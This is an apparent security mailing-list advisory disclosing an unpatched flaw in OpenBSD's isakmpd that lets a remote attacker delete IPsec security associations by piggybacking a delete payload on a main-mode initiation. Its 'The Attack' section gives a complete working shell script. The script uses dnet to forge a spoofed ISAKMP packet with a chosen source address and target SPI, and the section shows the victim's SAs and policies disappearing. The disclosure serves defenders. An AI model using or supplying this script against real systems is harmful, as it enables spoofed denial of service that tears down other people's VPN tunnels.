<<< Date Index >>>     <<< Thread Index >>>

unauthorized deletion of IPsec SAs in isakmpd, still



1 Abstract

  For nearly 10 months a handful of OpenBSD-developers is trying to fix
  a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
  released something like a final patch to a broader public. The patch
  protects against some specific attacks, but does not solve the
  problem. 

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on a initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

    sg-a# cat /kern/ipsec | grep SPI
    SPI = 97e49ca2, Destination = <sg-a's IP address>, Sproto = 50
    SPI = 901e38d9, Destination = <sg-b's IP address>, Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

    attacker# cat during_these_hostile_and_trying_times_and_what-not
    #!/bin/sh
    if [ ! $# -eq 3 ]; then
      echo "usage: $0 <faked-src> <victim> <spi>";
      exit;
    fi
    
    src=$1; dst=$2
    spi=`echo $3 | sed 's/\(..\)/\\\\x\1/g'`
    cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`
    
    dnet hex \
      $cky_i \
      "\x00\x00\x00\x00\x00\x00\x00\x00" \
      "\x01\x10\x02\x00" \
      "\x00\x00\x00\x00" \
      "\x00\x00\x00\x58" \
        "\x0c\x00\x00\x2c" \
        "\x00\x00\x00\x01" \
        "\x00\x00\x00\x01" \
          "\x00\x00\x00\x20" \
          "\x01\x01\x00\x01" \
          "\x00\x00\x00\x18" \
          "\x00\x01\x00\x00" \
          "\x80\x01\x00\x05" \
          "\x80\x02\x00\x02" \
          "\x80\x03\x00\x01" \
          "\x80\x04\x00\x02" \
        "\x00\x00\x00\x10" \
        "\x00\x00\x00\x01" \
        "\x03\x04\x00\x01" \
        $spi |
    dnet udp sport 500 dport 500 |
    dnet ip proto udp src $src dst $dst |
    dnet send

  He fires up his script with appropriate parameters:
    
    attacker# ./during_these_hostile_and_trying_times_and_what-not \
    > sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneous:
    
    sg-a# cat /kern/ipsec  
    Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski